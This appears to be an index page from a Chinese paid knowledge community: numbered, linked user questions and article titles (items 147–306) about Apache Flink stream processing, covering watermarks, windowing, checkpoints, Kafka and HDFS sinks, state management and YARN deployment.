147、[基于事件时间,每五分钟一个窗口,五秒钟滑动一次,同时watermark的时间同样是基于事件事件时间的,延迟设为1分钟,假如数据流从12:00开始,如果12:07-12:09期间没有产生任何一条数据,即在12:07-12:09这段间的数据流情况为···· (12:07:00,xxx),(12:09:00,xxx)······,那么窗口[12:02:05-12:07:05],[12:02:10-12:07:10]等几个窗口的计算是否意味着只有等到,12:09:00的数据到达之后才会触发](https://t.zsxq.com/fmq3fYF)
148、[使用flink1.7,当消费到某条消息(protobuf格式),报Caused by: org.apache.kafka.common.KafkaException: Record batch for partition Notify-18 at offset 1803009 is invalid, cause: Record is corrupt 这个异常。 如何设置跳过已损坏的消息继续消费下一条来保证业务不终断? 我看了官网kafka connectors那里,说在DeserializationSchema.deserialize(...)方法中返回null,flink就会跳过这条消息,然而依旧报这个异常](https://t.zsxq.com/MRvv3ZV)
149、[是否可以抽空总结一篇Flink 的 watermark 的原理案例?一直没搞明白基于事件时间处理时的数据乱序和数据迟到底咋回事](https://t.zsxq.com/MRJeAuj)
150、[flink中rpc通信的原理,与几个类的讲解,有没有系统详细的文章样,如有求分享,谢谢](https://t.zsxq.com/2rJyNrF)
151、[Flink中如何使用基于事件时间处理,但是又不使用Watermarks? 我在会话窗口中使用遇到一些问题,图一是基于处理时间的,测试结果session是基于keyby(用户)的,图二是基于事件时间的,不知道是我用法不对还是怎么的,测试结果发现并不是基于keyby(用户的),而是全局的session。不知道怎么修改?](https://t.zsxq.com/bM3ZZRf)
152、[flink实时计算平台,yarn模式日志收集怎么做,为什么会checkpoint失败,报警处理,后需要做什么吗?job监控怎么做](https://t.zsxq.com/BMVzzzB)
153、[有flink与jstorm的在不同应用场景下, 性能比较的数据吗? 从网络上能找大部分都是flink与storm的比较. 在jstorm官网上有一份比较的图表, 感觉参考意义不大, 应该是比较早的flink版本.](https://t.zsxq.com/237EAay)
154、[为什么使用SessionWindows.withGap窗口的话,State存不了东西呀,每次加1 ,拿出来都是null, 我换成 TimeWindow就没问题。](https://t.zsxq.com/J6eAmYb)
155、[请问一下,flink datastream流处理怎么统计去重指标? 官方文档中只看到批处理有distinct概念。](https://t.zsxq.com/y3nYZrf)
156、[好全的一篇文章,对比分析 Flink,Spark Streaming,Storm 框架](https://t.zsxq.com/qRjqFY3)
157、[关于 structured_streaming 的 paper](https://t.zsxq.com/Eau7qNB)
158、[zookeeper集群切换领导了,flink集群项目重启了就没有数据的输入和输出了,这个该从哪方面入手解决?](https://t.zsxq.com/rFYbEeq)
159、[我想请教下datastream怎么和静态数据join呢](https://t.zsxq.com/nEAaYNF)
160、[时钟问题导致收到了明天的数据,这时候有什么比较好的处理方法?看到有人设置一个最大的跳跃阈值,如果当前数据时间 - 历史最大时间 超过阈值就不更新。如何合理的设计水印,有没有一些经验呢?](https://t.zsxq.com/IAAeiA6)
161、[大佬们flink怎么定时查询数据库?](https://t.zsxq.com/EuJ2RRf)
162、[现在我们公司有个想法,就是提供一个页面,在页面上选择source sink 填写上sql语句,然后后台生成一个flink的作业,然后提交到集群。功能有点类似于华为的数据中台,就是页面傻瓜式操作。后台能自动根据相应配置得到结果。请问拘你的了解,可以实现吗?如何实现?有什么好的思路。现在我无从下手](https://t.zsxq.com/vzZBmYB)
163、[请教一下 flink on yarn 的 ha机制](https://t.zsxq.com/VRFIMfy)
164、[在一般的流处理以及cep, 都可以对于eventtime设置watermark, 有时可能需要设置相对大一点的值, 这内存压力就比较大, 有没有办法不应用jvm中的内存, 而用堆外内存, 或者其他缓存, 最好有cache机制, 这样可以应对大流量的峰值.](https://t.zsxq.com/FAiiEyr)
165、[请教一个flink sql的问题。我有两个聚合后的流表A和B,A和Bjoin得到C表。在设置state TTL 的时候是直接对C表设置还是,对A表和B表设置比较好?](https://t.zsxq.com/YnI2F66)
166、[spark改写为flink,会不会很复杂,还有这两者在SQL方面的支持差别大吗?](https://t.zsxq.com/unyneEU)
167、[请问flink allowedLateness导致窗口被多次fire,最终数据重复消费,这种问题怎么处理,数据是写到es中](https://t.zsxq.com/RfyZFUR)
168、[设置taskmanager.numberOfTaskSlots: 4的时候没有问题,但是cpu没有压上去,只用了30%左右,于是设置了taskmanager.numberOfTaskSlots: 8,但是就报错误找不到其中一个自定义的类,然后kafka数据就不消费了。为什么?cpu到多少合适?slot是不是和cpu数量一致是最佳配置?kafka分区数多少合适,是不是和slot,parallesim一致最佳?](https://t.zsxq.com/bIAEyFe)
169、[需求是根据每条日志切分出需要9个字段,有五个指标再根据9个字段的不同组合去做计算。 第一个方法是:我目前做法是切分的9个字段开5分钟大小1分钟计算一次的滑动窗口窗口,进行一次reduce去重,然后再map取出需要的字段,然后过滤再开5分钟大小1分钟计算一次的滑动窗口窗口进行计算保存结果,这个思路遇到的问题是上一个滑动窗口会每一分钟会计算5分钟数据,到第二个窗口划定的5分钟范围的数据会有好多重复,这个思路会造成数据重复。 第二个方法是:切分的9个字段开5分钟大小1分钟计算一次的滑动窗口窗口,再pross方法里完成所有的过滤,聚合计算,但是再高峰期每分钟400万条数据,这个思路担心在高峰期flink计算不过来](https://t.zsxq.com/BUNfYnY)
170、[a,b,c三个表,a和c有eventtime,a和c直接join可以,a和b join后再和c join 就会报错,这是怎么回事呢](https://t.zsxq.com/aAqBEY7)
171、[自定义的source是这样的(图一所示) 使用的时候是这样的(图二所示),为什么无论 sum.print().setParallelism(2)(图2所示)的并行度设置成几最后结果都是这样的](https://t.zsxq.com/zZNNRzr)
172、[刚接触flink,如有问的不合适的地方,请见谅。 1、为什么说flink是有状态的计算? 2、这个状态是什么?3、状态存在哪里](https://t.zsxq.com/i6Mz7Yj)
173、[这边用flink 1.8.1的版本,采用flink on yarn,hadoop版本2.6.0。代码是一个简单的滚动窗口统计函数,但启动的时候报错,如下图片。 (2)然后我把flink版本换成1.7.1,重新提交到2.6.0的yarn平台,就能正常运行了。 (3)我们测试集群hadoop版本是3.0,我用flink 1.8.1版本将这个程序再次打包,提交到3.0版本的yarn平台,也能正常运行。 貌似是flink 1.8.1版本与yarn 2.6.0版本不兼容造成的这个问题](https://t.zsxq.com/vNjAIMN)
174、[StateBackend我使用的是MemoryStateBackend, State是怎么释放内存的,例如我在函数中用ValueState存储了历史状态信息。但是历史状态数据我没有手动释放,那么程序会自动释放么?还是一直驻留在内存中](https://t.zsxq.com/2rVbm6Y)
175、[请问老师是否可以提供一些Apachebeam的学习资料 谢谢](https://t.zsxq.com/3bIEAyv)
176、[flink 的 DataSet或者DataStream支持索引查询以及删除吗,像spark rdd,如果不支持的话,该转换成什么](https://t.zsxq.com/yFEyZVB)
177、[关于flink的状态,能否把它当做数据库使用,类似于内存数据库,在处理过程中存业务数据。如果是数据库可以算是分布式数据库吗?是不是使用rocksdb这种存储方式才算是?支持的单库大小是不是只是跟本地机器的磁盘大小相关?如果使用硬盘存储会不会效率性能有影响](https://t.zsxq.com/VNrn6iI)
178、[我这边做了个http sink,想要批量发送数据,不过现在只能用数量控制发送,但最后的几个记录没法触发发送动作,想问下有没有什么办法](https://t.zsxq.com/yfmiUvf)
179、[请问下如何做定时去重计数,就是根据时间分窗口,窗口内根据id去重计数得出结果,多谢。试了不少办法,没有简单直接办法](https://t.zsxq.com/vNvrfmE)
180、[我有个job使用了elastic search sink. 设置了批量5000一写入,但是看es监控显示每秒只能插入500条。是不是bulkprocessor的currentrequest为0有关](https://t.zsxq.com/rzZbQFA)
181、[有docker部署flink的资料吗](https://t.zsxq.com/aIur7ai)
182、[在说明KeyBy的StreamGraph执行过程时,keyBy的ID为啥是6? 根据前面说,ID是一个静态变量,每取一次就递增1,我觉得应该是3啊,是我理解错了吗](https://t.zsxq.com/VjQjqF6)
183、[有没计划出Execution Graph的远码解析](https://t.zsxq.com/BEmAIQv)
184、[可以分享下物理执行图怎样划分task,以及task如何执行,还有他们之间数据如何传递这块代码嘛?](https://t.zsxq.com/vVjiYJQ)
185、[Flink源码和这个学习项目的结构图](https://t.zsxq.com/FyNJQbQ)
186、[请问flink1.8,如何做到动态加载外部udf-jar包呢?](https://t.zsxq.com/qrjmmaU)
187、[同一个Task Manager中不同的Slot是怎么交互的,比如:source处理完要传递给map的时候,如果在不同的Slot中,他们的内存是相互隔离,是怎么交互的呢? 我猜是通过序列化和反序列化对象,并且通过网络来进行交互的](https://t.zsxq.com/ZFQjQnm)
188、[你们有没有这种业务场景。flink从kafka里面取数据,每一条数据里面有mongdb表A的id,这时我会在map的时候采用flink的异步IO连接A表,然后查询出A表的字段1,再根据该字段1又需要异步IO去B表查询字段2,然后又根据字段2去C表查询字段3.....像这样的业务场景,如果多来几种逻辑,我应该用什么方案最好呢](https://t.zsxq.com/YBQFufi)
189、[今天本地运行flink程序,消费socket中的数据,连续只能消费两条,第三条flink就消费不了了](https://t.zsxq.com/vnufYFY)
190、[源数据经过过滤后分成了两条流,然后再分别提取事件时间和水印,做时间窗口,我测试时一条流没有数据,另一条的数据看日志到了窗口操作那边就没走下去,貌似窗口一直没有等到触发](https://t.zsxq.com/me6EmM3)
191、[有做flink cep的吗,有资料没?](https://t.zsxq.com/fubQrvj)
192、[麻烦问一下 BucketingSink跨集群写,如果任务运行在hadoop A集群,从kafka读取数据处理后写到Hadoo B集群,即使把core-site.xml和hdfs-site.xml拷贝到代码resources下,路径使用hdfs://hadoopB/xxx,会提示ava.lang.RuntimeException: Error while creating FileSystem when initializing the state of the BucketingSink.,跨集群写这个问题 flink不支持吗?](https://t.zsxq.com/fEQVjAe)
193、[想咨询下,如何对flink中的datastream和dataset进行数据采样](https://t.zsxq.com/fIMVJ2J)
194、[一个flink作业经常发生oom,可能是什么原因导致的。 处理流程只有15+字段的解析,redis数据读取等操作,TM配置10g。 业务会在夜间刷数据,qps能打到2500左右~](https://t.zsxq.com/7MVjyzz)
195、[我看到flink 1.8的状态过期仅支持Processing Time,那么如果我使用的是Event time那么状态就不会过期吗](https://t.zsxq.com/jA2NVnU)
196、[请问我想每隔一小时统计一个属性从当天零点到当前时间的平均值,这样的时间窗该如何定义?](https://t.zsxq.com/BQv33Rb)
197、[flink任务里面反序列化一个类,报ClassNotFoundException,可是包里面是有这个类的,有遇到这种情况吗?](https://t.zsxq.com/nEAiIea)
198、[在构造StreamGraph,类似PartitionTransformmation 这种类型的 transform,为什么要添加成一个虚拟节点,而不是一个实际的物理节点呢?](https://t.zsxq.com/RnayrVn)
199、[flink消费kafka的数据写入到hdfs中,我采用了BucketingSink 这个sink将operator出来的数据写入到hdfs文件上,并通过在hive中建外部表来查询这个。但现在有个问题,处于in-progress的文件,hive是无法识别出来该文件中的数据,可我想能在hive中实时查询进来的数据,且不想产生很多的小文件,这个该如何处理呢](https://t.zsxq.com/A2fYNFA)
200、[采用Flink单机集群模式一个jobmanager和两个taskmanager,机器是单机是24核,现在做个简单的功能从kafka的一个topic转满足条件的消息到另一个topic,topic的分区是30,我设置了程序默认并发为30,现在每秒消费2w多数据,不够快,请问可以怎么提高job的性能呢?](https://t.zsxq.com/7AurJU3)
201、[Flink Metric 源码分析](https://t.zsxq.com/Mnm2nI6)
202、[请问怎么理解官网的这段话?按官网的例子,难道只keyby之后才有keyed state,才能托管Flink存储状态么?source和map如果没有自定义operator state的话,状态是不会被保存的?](https://t.zsxq.com/iAi6QRb)
203、[想用Flink做业务监控告警,并要能够支持动态添加CEP规则,问下可以直接使用Flink CEP还是siddhi CEP? 有没有相关的资料学习下?谢谢!](https://t.zsxq.com/3rbeuju)
204、[请问一下,有没有关于水印,触发器的Java方面的demo啊](https://t.zsxq.com/eYJUbm6)
205、[老师,最近我们线上偶尔出现这种情况,就是40个并行度,其他有一个并行度CheckPoint一直失败,其他39个并行度都是毫秒级别就可以CheckPoint成功,这个怎么定位问题呢?还有个问题 CheckPoint的时间分为三部分 Checkpoint Duration (Async)和 Checkpoint Duration (Sync),还有个 end to end 减去同步和异步的时间,这三部分 分别指代哪块?如果发现这三者中的任意一个步骤时间长,该怎么去优化](https://t.zsxq.com/QvbAqVB)
206、[我这边有个场景很依赖消费出来的数据的顺序。在源头侧做了很多处理,将kafka修改成一个分区等等很多尝试,最后消费出来的还是乱序的。能不能在flink消费的时候做处理,来保证处理的数据的顺序。](https://t.zsxq.com/JaUZvbY)
207、[有一个类似于实时计算今天的pv,uv需求,采用source->keyby->window->trigger->process后,在process里采用ValueState计算uv ,问题是 这个window内一天的所有数据是都会缓存到flink嘛? 一天的数据量如果大点,这样实现就有问题了, 这个有其他的实现思路嘛?](https://t.zsxq.com/iQfaAeu)
208、[Flink 注解源码解析](https://t.zsxq.com/f6eAu3J)
209、[如何监控 Flink 的 TaskManager 和 JobManager](https://t.zsxq.com/IuRJYne)
210、[问下,在真实流计算过程中,并行度的设置,是与 kafka topic的partition数一样的吗?](https://t.zsxq.com/v7yfEIq)
211、[Flink的日志 如果自己做平台封装在自己的界面中 请问job Manger 和 taskManger 还有用户自己的程序日志 怎么获取呢 有api还是自己需要利用flume 采集到ELK?](https://t.zsxq.com/Zf2F6mM)
212、[我想问下一般用Flink统计pv uv是怎么做的?uv存到redis? 每个uv都存到redis,会不会撑爆?](https://t.zsxq.com/72VzBEy)
213、[Flink的Checkpoint 机制,在有多个source的时候,barrier n 的流将被暂时搁置,从其他流接收的记录将不会被处理,但是会放进一个输入缓存input buffer。如果被缓存的record大小超出了input buffer会怎么样?不可能一直缓存下去吧,如果其中某一条就一直没数据的话,整个过程岂不是卡死了?](https://t.zsxq.com/zBmm2fq)
214、[公司想实时展示订单数据,汇总金额,并需要和前端交互,实时生成数据需要告诉前端,展示成折线图,这种场景的技术选型是如何呢?包括数据的存储,临时汇总数据的存储,何种形式告诉前端](https://t.zsxq.com/ZnIAi2j)
215、[请问下checkpoint中存储了哪些东西?](https://t.zsxq.com/7EIeEyJ)
216、[我这边有个需求是实时计算当前车辆与前车距离,用经纬度求距离。大概6000台车,10秒一条经纬度数据。gps流与自己join的地方在进行checkpoint的时候特别缓,每次要好几分钟。checkpoint 状态后端是rocksDB。有什么比较好的方案吗?自己实现一个类似last_value的函数取车辆最新的经纬再join,或者弄个10秒的滑动窗口输出车辆最新的经纬度再进行join,这样可行吗?](https://t.zsxq.com/euvFaYz)
217、[flink在启动的时候能不能指定一个时间点从kafka里面恢复数据呢](https://t.zsxq.com/YRnEUFe)
218、[我们线上有个问题,很多业务都去读某个hive表,但是当这个hive表正在写数据的时候,偶尔出现过 读到表里数据为空的情况,这个问题怎么解决呢?](https://t.zsxq.com/7QJEEyr)
219、[使用 InfluxDB 和 Grafana 搭建监控 Flink 的平台](https://t.zsxq.com/yVnaYR7)
220、[flink消费kafka两个不同的topic,然后进行join操作,如果使用事件时间,两个topic都要设置watermaker吗,如果只设置了topic A的watermaker,topic B的不设置会有什么影响吗?](https://t.zsxq.com/uvFU7aY)
221、[请教一个问题,我的Flink程序运行一段时间就会报这个错误,定位好多天都没有定位到。checkpoint 时间是5秒,20秒都不行。Caused by: java.io.IOException: Could not flush and close the file system output stream to hdfs://HDFSaaaa/flink/PointWideTable_OffTest_Test2/1eb66edcfccce6124c3b2d6ae402ec39/chk-355/1005127c-cee3-4099-8b61-aef819d72404 in order to obtain the stream state handle](https://t.zsxq.com/NNFYJMn)
222、[Flink的反压机制相比于Storm的反压机制有什么优势呢?问题2: Flink的某一个节点发生故障,是否会影响其他节点的正常工作?还是会通过Checkpoint容错机制吗把任务转移到其他节点去运行呢?](https://t.zsxq.com/yvRNFEI)
223、[我在验证checkpoint的时候遇到给问题,不管是key state 还是operator state,默认和指定uid是可以的恢复state数据的,当指定uidHash时候无法恢复state数据,麻烦大家给解答一样。我操作state是实现了CheckpointedFunction接口,覆写snapshotState和initializeState,再这两个方法里操作的,然后让程序定时抛出异常,观察发现指定uidHash后snapshotState()方法里context.isRestored()为false,不太明白具体是什么原因](https://t.zsxq.com/ZJmiqZz)
224、[kafka 中的每条数据需要和 es 中的所有数据(动态增加)关联,关联之后会做一些额外的操作,这个有什么比较可行的方案?](https://t.zsxq.com/mYV37qF)
225、[flink消费kafka数据,设置1分钟checkpoint一次,假如第一次checkpoint完成以后,还没等到下一次checkpoint,程序就挂了,kafka offset还是第一次checkpoint记录的offset,那么下次重新启动程序,岂不是多消费数据了?那flink的 exactly one消费语义是怎么样的?](https://t.zsxq.com/buFeyZr)
226、[程序频繁发生Heartbeat of TaskManager with id container_e36_1564049750010_5829_01_000024 timed out. 心跳超时,一天大概10次左右。是内存没给够吗?还是网络波动引起的](https://t.zsxq.com/Znyja62)
227、[有没有性能优化方面的指导文章?](https://t.zsxq.com/AA6ma2Z)
228、[flink消费kafka是如何监控消费是否正常的,有啥好办法?](https://t.zsxq.com/a2N37a6)
229、[我按照官方的wordcount案例写了一个例子,然后在main函数中起了一个线程,原本是准备定时去更新某些配置,准备测试一下是否可行,所以直接在线程函数中打印一条语句测试是否可行。现在测试的结果是不可行,貌似这个线程根本就没有执行,请问这是什么原因呢? 按照理解,JobClient中不是反射类执行main函数吗, 执行main函数的时候为什么没有执行这个线程的打印函数呢?](https://t.zsxq.com/m2FeeMf)
230、[请问我想保留最近多个完成的checkpoint数据,是通过设置 state.checkpoints.num-retained 吗?要怎么使用?](https://t.zsxq.com/EyFUb6m)
231、[有没有etl实时数仓相关案例么?比如二十张事实表流join](https://t.zsxq.com/rFeIAeA)
232、[为什么我扔到flink 的stream job,立刻就finished](https://t.zsxq.com/n2RFmyN)
233、[有没有在flink上机器学习算法的一些例子啊,除了官网提供的flink exampke里的和flink ml里已有的](https://t.zsxq.com/iqJiyvN)
234、[如果我想扩展sql的关键词,比如添加一些数据支持,有什么思路,现在想的感觉都要改calcite(刚碰flink感觉难度太大了)](https://t.zsxq.com/uB6aUzZ)
235、[我想实现统计每5秒中每个类型的次数,这个现在不输出,问题出在哪儿啊](https://t.zsxq.com/2BEeu3Z)
236、[我用flink往hbase里写数据,有那种直接批量写hfile的方式的demo没](https://t.zsxq.com/VBA6IUR)
237、[请问怎么监控Kafka消费是否延迟,是否出现消息积压?你有demo吗?这种是用Springboot自己写一个监控,还是咋整啊?](https://t.zsxq.com/IieMFMB)
238、[请问有计算pv uv的例子吗](https://t.zsxq.com/j2fM3BM)
239、[通过控制流动态修改window算子窗口类型和长度要怎么写](https://t.zsxq.com/Rb2Z7uB)
240、[flink的远程调试能出一版么?网上资料坑的多](https://t.zsxq.com/UVbaQfM)
241、[企业里,Flink开发,java用得多,还是scala用得多?](https://t.zsxq.com/AYVjAuB)
242、[flink的任务运行在yarn的环境上,在yarn的resourcemanager在进行主备切换时,所有的flink任务都失败了,而MR的任务可以正常运行。报错信息如下:AM is not registered for known application attempt: appattempt_1565306391442_89321_000001 or RM had restarted after AM registered . AM should re-register
请问这是什么原因,该如何处理呢?](https://t.zsxq.com/j6QfMzf)
243、[请教一个分布式问题,比如在Flink的多个TaskManager上统计指标count,TM1有两条数据,TM2有一条数据,程序是怎么计算出来是3呢?原理是怎么样的](https://t.zsxq.com/IUVZjUv)
244、[现在公司部分sql查询oracle数据特别的慢,因为查询条件很多想问一下有什么方法,例如基于大数据组件可以加快查询速度的吗?](https://t.zsxq.com/7MFEQR3)
245、[想咨询下有没有做过flink同步配置做自定义计算的系统?或者有没有什么好的建议?业务诉求是希望业务用户可以自助配置计算规则做流式计算](https://t.zsxq.com/Mfa6aQB)
246、[我这边有个实时同步数据的任务,白天运行的时候一直是正常的,一到凌晨2点多之后就没有数据sink进mysql。晚上会有一些离线任务和一些dataX任务同步数据到mysql。但是任务一切都是正常的,ck也很快20ms,数据也是正常消费。看了yarn上的日志,没有任何error。自定义的sink里面也设置了日志打印,但是log里没有。这种如何快速定位问题。](https://t.zsxq.com/z3bunyN)
247、[有没有flink处理异常数据的案例资料](https://t.zsxq.com/Y3fe6Mn)
248、[flink中如何传递一个全局变量](https://t.zsxq.com/I2Z7Ybm)
249、[台4核16G的Flink taskmanager配一个单独的Yarn需要一台啥样的服务器?其他功能都不需要就一个调度的东西?](https://t.zsxq.com/iIUZrju)
250、[side-output 的分享](https://t.zsxq.com/m6I2BEE)
251、[使用 InfluxDB + Grafana 监控flink能否配置告警。是不是prometheus更强大点?](https://t.zsxq.com/amURFme)
252、[我们线上遇到一个问题,带状态的算子没有指定 uid,现在代码必须改,那个带状态的算子 不能正常恢复了,有解吗?通过某种方式能获取到系统之前自动生成的uid吗?](https://t.zsxq.com/rZfyZvn)
253、[tableEnv.registerDataStream(""Orders"", ds, ""user, product, amount, proctime.proctime, rowtime.rowtime"");请问像这样把流注册成表的时候,这两个rowtime分别是什么意思](https://t.zsxq.com/uZz3Z7Q)
254、[我想问一下 flink on yarn session 模式下提交任务官网给的例子是 flink run -c xxx.MainClass job.jar 这里是怎么知道 yarn 上的哪个是 flink 的 appid 呢?](https://t.zsxq.com/yBiEyf2)
255、[Flink Netty Connector 这个有详细的使用例子? 通过Netty建立的source能直接回复消息吗?还是只能被动接受消息?](https://t.zsxq.com/yBeyfqv)
256、[请问flink sqlclient 提交的作业可以用于生产环境吗?](https://t.zsxq.com/FIEia6M)
257、[flink批处理写回mysql是否没法用tableEnv.sqlUpdate(""insert into t2 select * from t1"")?作为sink表的t2要如何注册?查跟jdbc相关的就两个TableSink,JDBCAppendTableSink用于BatchTableSink,JDBCUpertTablSink用于StreamTableSink。前者只接受insert into values语法。所以我是先通过select from查询获取到DataSet再JDBCAppendTableSink.emitDataSet(ds)实现的,但这样达不到sql rule any目标](https://t.zsxq.com/ZBIaUvF)
258、[请问在stream模式下,flink的计算结果在不落库的情况下,可以通过什么restful api获取计算结果吗](https://t.zsxq.com/aq3BIU7)
259、[现在我有场景,需要把一定的消息发送给kafka topic指定的partition,该怎么搞?](https://t.zsxq.com/NbYnAYF)
260、[请问我的job作业在idea上运行正常 提交到生产集群里提示Caused by: java.lang.NoSuchMethodError: org.apache.flink.api.java.ClosureCleaner.clean(Ljava/lang/Object;Z)V请问如何解决](https://t.zsxq.com/YfmAMfm)
261、[遇到一个很奇怪的问题,在使用streamingSQL时,发现timestamp在datastream的时候还是正常的,在注册成表print出来的时候就少了八小时,大佬知道是什么原因么?](https://t.zsxq.com/72n6MVb)
262、[请问将flink的产生的一些记录日志异步到kafka中,需要如何配置,配置后必须要重启集群才会生效吗](https://t.zsxq.com/RjQFmIQ)
263、[星主你好,问下flink1.9对维表join的支持怎么样了?有文档吗](https://t.zsxq.com/Q7u3vzR)
264、[请问下 flink slq: SELECT city_name as city_name, count(1) as total, max(create_time) as create_time FROM * 。代码里面设置窗口为: retractStream.timeWindowAll(Time.minutes(5))一个global窗口,数据写入hdfs 结果数据重复 ,存在两条完全重复的数据如下 常州、2283、 1566230703):请问这是为什么](https://t.zsxq.com/aEEA66M)
265、[我用rocksdb存储checkpoint,线上运行一段时间发展checkpoint占用空间越来越大,我是直接存本地磁盘上的,怎么样能让它自动清理呢?](https://t.zsxq.com/YNrfyrj)
266、[flink应该在哪个用户下启动呢,是root的还是在其他的用户呢](https://t.zsxq.com/aAaqFYn)
267、[link可以读取lzo的文件吗](https://t.zsxq.com/2nUBIAI)
268、[怎么快速从es里面便利数据?我们公司现在所有的数据都存在Es里面的;我发现每次从里面scan数据的时候特别慢;你那有没有什么好的办法?](https://t.zsxq.com/beIY7mY)
269、[如果想让数据按照其中一个假如f0进行分区,然后每一个分区做处理的时候并行度都是1怎么设置呢](https://t.zsxq.com/fYnYrR7)
270、[近在写算子的过程中,使用scala语言写flink比较快,而且在process算子中实现ontime方式时,可以使用scala中的listbuff来输出一个top3的记录;那么到了java中,只能用ArrayList将flink中的ListState使用get()方法取出之后放在ArrayList吗?](https://t.zsxq.com/nQFYrBm)
271、[请问老师能否出一些1.9版本维表join的例子 包括async和维表缓存?](https://t.zsxq.com/eyRRv7q)
272、[flink kaka source设置为从组内消费,有个问题是第一次启动任务,我发现kafka中的历史数据不会被消费,而是从当前的数据开始消费,而第二次启动的时候才会从组的offset开始消费,有什么办法可以让第一次启动任务的时候可以消费kafka中的历史数据吗](https://t.zsxq.com/aMRzjMb)
273、[1.使用flink定时处理离线数据,有时间戳字段,如何求出每分钟的最大值,类似于流处理窗口那样,2如果想自己实现批流统一,有什么好的合并方向吗?比如想让流处理使用批处理的一个算子。](https://t.zsxq.com/3ZjiEMv)
274、[flink怎么实现流式数据批量对待?流的数据是自定义的source,读取的redis多个Hash表,需要控制批次的概念](https://t.zsxq.com/AIYnEQN)
275、[有人说不推荐在一个task中开多个线程,这个你怎么看?](https://t.zsxq.com/yJuFEYb)
276、[想做一个运行在hbase+es架构上的sql查询方案,flink sql能做吗,或者有没有其他的解决方案或者思路?](https://t.zsxq.com/3f6YBmu)
277、[正在紧急做第一个用到Flink的项目,咨询一下,Flink 1.8.1写入ES7就是用自带的Sink吗?有没有例子分享一下,我搜到的都是写ES6的。这种要求我知道不适合提,主要是急,自己试几下没成功。T T](https://t.zsxq.com/jIAqVnm)
278、[手动停止任务后,已经保存了最近一次保存点,任务重新启动后,如何使用上一次检查点?](https://t.zsxq.com/2fAiuzf)
279、[批处理使用流环境(为了使用窗口),那如何确定批处理结束,就是我的任务可以知道批文件读取完事,并且处理完数据后关闭任务,如果不能,那批处理如何实现窗口功能](https://t.zsxq.com/BIiImQN)
280、[如果限制只能在window 内进行去重,数据量还比较大,有什么好的方法吗?](https://t.zsxq.com/Mjyzj66)
281、[端到端exactly once有没有出文章](https://t.zsxq.com/yv7Ujme)
282、[流怎么动态加?,流怎么动态删除?,参数怎么动态修改 (广播](https://t.zsxq.com/IqNZFey)
283、[自定义的source数据源实现了有批次的概念,然后Flink将这个一个批次流注册为多个表join操作,有办法知道这个sql什么时候计算完成了?](https://t.zsxq.com/r7AqvBq)
284、[编译 Flink 报错,群主遇到过没,什么原因](https://t.zsxq.com/rvJiyf6)
285、[我现在是flink on yarn用zookeeper做HA现在在zk里查看检查点信息,为什么里面的文件是ip,而不是路径呢?我该如何拿到那个路径。
- 排除rest api 方式获取,因为任务关了restapi就没了
-排除history server,有点不好用](https://t.zsxq.com/nufIaey)
286、[在使用streamfilesink消费kafka之后进行hdfs写入的时候,当直接关闭flink程序的时候,下次再启动程序消费写入hdfs的时候,文件又是从part-0-0开始,这样就跟原来写入的冲突了,该文件就一直处于ingress状态。](https://t.zsxq.com/Fy3RfE6)
287、[现在有一个实时数据分析的需求,数据量不大,但要求sink到mysql,因为是实时更新的,我现在能想到的处理方法就是每次插入一条数据的时候,先从mysql读数据,如果有这条,就执行update,没有的话就insert,但是这样的话每写一条数据就有两次交互了。想问一下老师有没有更好的办法,或者flink有没有内置的api可以执行这种不确定是更新还是插入的操作](https://t.zsxq.com/myNF2zj)
288、[Flink设置了checkpoint,job manage会定期删除check point数据,但是task manage不删除,这个是什么原因](https://t.zsxq.com/ZFiMzrF)
289、[请教一下使用rocksdb作为statebackend ,在哪里可以监控rocksdb io 内存指标呢](https://t.zsxq.com/z3RzJUV)
290、[状态的使用场景,以及用法能出个文章不,这块不太了解](https://t.zsxq.com/AUjE2ZR)
291、[请问一下 Flink 1.9 SQL API中distinct count 是如何实现高效的流式去重的?](https://t.zsxq.com/aaynii6)
292、[在算子内如何获取当前算子并行度以及当前是第几个task](https://t.zsxq.com/mmEyVJA)
293、[有没有flink1.9结合hive的demo。kafka到hive](https://t.zsxq.com/fIqNF6y)
294、[能给讲讲apache calcite吗](https://t.zsxq.com/ne6UZrB)
295、[请问一下像这种窗口操作,怎么保证程序异常重启后保持数据的状态呢?](https://t.zsxq.com/VbUVFMr)
296、[请问一下,我在使用kafkasource的时候,把接过来的Jsonstr转化成自定义的一个类型,用的是gson. fromJson(jsonstr,classOf[Entity])报图片上的错误了,不知道怎么解决,在不转直接打印的情况下是没问题的](https://t.zsxq.com/EMZFyZz)
297、[DataStream读数据库的表,做多表join,能设置时间窗口么,一天去刷一次。流程序会一直拉数据,数据库扛不住了](https://t.zsxq.com/IEieI6a)
298、[请问一下flink支持多路径通配读取吗?例如路径:s3n://pekdc2-deeplink-01/Kinesis/firehose/2019/07/03/*/* ,通配读取找不到路径。是否需要特殊设置](https://t.zsxq.com/IemmiY7)
299、[flink yarn环境部署 但是把容器的url地址删除。就会跳转到的hadoop的首页。怎么屏蔽hadoop的yarn首页地址呢?要不暴露这个地址用户能看到所有任务很危险](https://t.zsxq.com/QvZFUNN)
300、[flink sql怎么写一个流,每秒输出当前时间呢](https://t.zsxq.com/2JiubeM)
301、[因为想通过sql弄一个数据流。哈哈 另外想问一个问题,我把全局设置为根据处理时间的时间窗口,那么我在processAllWindowFunction里面要怎么知道进来的每个元素的处理时间是多少呢?这个元素进入这个时间窗口的依据是什么](https://t.zsxq.com/bQ33BmM)
302、[如何实现一个设备上报的数据存储到同一个hdfs文件中?](https://t.zsxq.com/rB6ybYF)
303、[我自己写的kafka生产者测试,数据格式十分简单(key,i)key是一个固定的不变的字符串,i是自增的,flink consumer这边我开了checkpoint. 并且是exactly once,然后程序很简单,就是flink读取kafka的数据然后直接打印出来,我发现比如我看到打印到key,10的时候我直接关掉程序,然后重新启动程序,按理来说应当是从上次的offset继续消费,也就是key,11,但实际上我看到的可能是从key,9开始,然后依次递增,这是是不是说明是重复消费了,那exactly one需要怎么样去保障?](https://t.zsxq.com/MVfeeiu)
304、[假设有一个数据源在源源不断的产生数据,到Flink的反压来到source端的时候,由于Flink处理数据的速度跟不上数据源产生数据的速度,
问题1: 这个时候在Flink的source端会怎么处理呢?是将处理不完的数据丢弃还是进行缓存呢?
问题2: 如果是缓存,怎么进行缓存呢?](https://t.zsxq.com/meqzJme)
305、[一个stream 在sink多个时,这多个sink是串行 还是并行的。](https://t.zsxq.com/2fEeMny)
306、[我想在流上做一个窗口,触发窗口的条件是固定的时间间隔或者数据量达到预切值,两个条件只要有一个满足就触发,除了重写trigger在,还有什么别的方法吗?](https://t.zsxq.com/NJY76uf)
